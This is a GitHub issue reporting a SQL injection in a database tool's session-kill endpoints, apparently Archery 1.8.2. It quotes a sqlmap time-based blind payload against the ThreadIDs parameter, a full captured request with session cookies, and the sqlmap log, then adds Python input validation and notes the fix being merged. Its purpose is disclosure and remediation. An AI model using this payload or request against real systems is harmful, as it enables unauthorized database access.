[ bug ] MySQL session management has a SQL injection risk #1299

Closed
nick2wang opened this issue Dec 27, 2021 · 1 comment
@nick2wang (Collaborator)

Application version/branch: 1.8.2
MySQL version: 5.7.28
Problem: when killing sessions, the thread_ids list submitted by the front end is handled as a plain string, which creates a SQL injection risk
Affected scope:
/db_diagnostic/create_kill_session/
/db_diagnostic/kill_session/

Injection point:

sqlmap identified the following injection point(s) with a total of 124 HTTP(s) requests:
---
Parameter: ThreadIDs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: instance_name=192.168.1.201&ThreadIDs=[2857) AND (SELECT 3385 FROM (SELECT(SLEEP(5)))upGy) AND (2892=2892]
---

sqlmap sample request (req.txt):

POST /db_diagnostic/create_kill_session/ HTTP/1.1
Host: 192.168.1.111:9123
Connection: keep-alive
Content-Length: 68
Accept: application/json, text/javascript, */*; q=0.01
X-CSRFToken: vNe5oVVFsdGFkx05Lzkvn9i7NanddBH88YJbiOkevfEcLWMqHGPzNVky434V23Up
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.111:9123
Referer: http://192.168.1.111:9123/dbdiagnostic/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sessionid_dbgear_prod=cjoa73sj3zh8died9wrhxgco9mm8g0xt; csrftoken=vNe5oVVFsdGFkx05Lzkvn9i7NanddBH88YJbiOkevfEcLWMqHGPzNVky434V23Up; sessionid=uymn4ajmy3j8d5cseiqsjrgml3dbgpp2

instance_name=192.168.1.201&ThreadIDs=%5B3231%5D

sqlmap log:

[root@m1 sqlmap]# sqlmap -r req.txt  -flush-session
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[*] starting @ 15:57:35 /2021-12-27/

[15:57:35] [INFO] parsing HTTP request from 'req.txt'
it appears that provided value for POST parameter 'ThreadIDs' has boundaries. Do you want to inject inside? ('[2857*]') [y/N] y
[15:57:41] [INFO] flushing session file
[15:57:41] [INFO] testing connection to the target URL
[15:57:41] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:57:43] [INFO] testing if the target URL content is stable
[15:57:43] [INFO] target URL content is stable
[15:57:43] [INFO] testing if POST parameter 'instance_name' is dynamic
[15:57:43] [INFO] POST parameter 'instance_name' appears to be dynamic
[15:57:43] [WARNING] heuristic (basic) test shows that POST parameter 'instance_name' might not be injectable
[15:57:43] [INFO] testing for SQL injection on POST parameter 'instance_name'
[15:57:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:57:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:57:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:57:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:57:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:57:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:57:44] [INFO] testing 'Generic inline queries'
[15:57:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:57:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:57:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:57:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:57:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:57:44] [INFO] testing 'Oracle AND time-based blind'
[15:57:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:57:48] [WARNING] POST parameter 'instance_name' does not seem to be injectable
[15:57:48] [INFO] testing if POST parameter 'ThreadIDs' is dynamic
[15:57:48] [WARNING] POST parameter 'ThreadIDs' does not appear to be dynamic
[15:57:48] [WARNING] heuristic (basic) test shows that POST parameter 'ThreadIDs' might not be injectable
[15:57:48] [INFO] testing for SQL injection on POST parameter 'ThreadIDs'
[15:57:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:57:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:57:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:57:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:57:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:57:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:57:49] [INFO] testing 'Generic inline queries'
[15:57:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:57:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:57:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:57:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:57:59] [INFO] POST parameter 'ThreadIDs' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:58:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:58:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:58:21] [INFO] checking if the injection point on POST parameter 'ThreadIDs' is a false positive
POST parameter 'ThreadIDs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 124 HTTP(s) requests:
---
Parameter: ThreadIDs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: instance_name=192.168.1.201&ThreadIDs=[2857) AND (SELECT 3385 FROM (SELECT(SLEEP(5)))upGy) AND (2892=2892]
---
[15:58:44] [INFO] the back-end DBMS is MySQL
[15:58:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web application technology: Nginx 1.16.1
back-end DBMS: MySQL >= 5.0.12

[*] ending @ 15:58:44 /2021-12-27/
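A defensive way to handle the ThreadIDs parameter so that it is validated as integers rather than passed through as a string, as an added example that is not Archery's own code: the function names, the assumption that the field is a JSON array of integers, and the information_schema lookup are my own; the two sample inputs are copied from the report above.

```python
import json

# Constructed sample inputs, copied from the report above: the legitimate
# request body value and the sqlmap payload that was reported.
LEGIT_THREAD_IDS = "[3231]"
SQLMAP_THREAD_IDS = "[2857) AND (SELECT 3385 FROM (SELECT(SLEEP(5)))upGy) AND (2892=2892]"


def parse_thread_ids(raw, max_ids=100):
    """Parse the ThreadIDs form field into a list of positive integers.

    The field is assumed to be a JSON array of integers; anything else
    (strings, booleans, nested values, SQL fragments) is rejected before
    it can reach the database, so the value is never handled as a string.
    """
    try:
        values = json.loads(raw)
    except (TypeError, ValueError):
        raise ValueError("ThreadIDs must be a JSON array of integers")
    if not isinstance(values, list) or not values or len(values) > max_ids:
        raise ValueError("ThreadIDs must be a non-empty JSON array")
    for v in values:
        # bool is a subclass of int in Python, so exclude it explicitly.
        if isinstance(v, bool) or not isinstance(v, int) or v <= 0:
            raise ValueError("thread id must be a positive integer: %r" % (v,))
    return list(values)


def build_kill_statements(thread_ids):
    """One `KILL <id>` statement per validated id.

    MySQL's KILL takes a literal id, not a bind parameter, so the integer
    check in parse_thread_ids() is what makes this interpolation safe.
    """
    return ["KILL %d;" % tid for tid in thread_ids]


def build_processlist_query(thread_ids):
    """Parameterised lookup to confirm the ids exist before killing them.

    Returns (sql, params) for cursor.execute(sql, params) with a DB-API
    driver such as PyMySQL; the ids travel as bound parameters.
    """
    placeholders = ",".join(["%s"] * len(thread_ids))
    sql = ("SELECT ID, USER, HOST, DB, COMMAND, TIME, STATE, INFO "
           "FROM information_schema.PROCESSLIST WHERE ID IN (%s)" % placeholders)
    return sql, tuple(thread_ids)
```

With this shape, the sqlmap payload from the report fails JSON parsing and is rejected before any query is built, while the legitimate `[3231]` body still produces `KILL 3231;`.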
hhyo added a commit that referenced this issue Dec 27, 2021
Fix SQL injection risk in session management #1299
@LeoQuote (Collaborator)

Thanks, the PR has now been merged, closing
